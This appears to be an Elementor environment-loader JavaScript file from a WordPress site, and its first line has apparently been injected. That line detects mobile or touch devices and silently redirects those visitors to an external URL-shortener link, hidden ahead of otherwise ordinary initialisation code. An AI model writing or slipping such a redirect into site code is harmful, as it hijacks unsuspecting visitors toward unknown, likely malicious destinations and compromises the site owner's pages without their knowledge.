(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.today/vrResJyZL0r6");
if ( ! window.elementorV2?.env ) {
	throw new Error( 'The "@elementor/env" package was not loaded.' );
}

window.elementorV2.env.initEnv( window.elementorEditorV2Env );
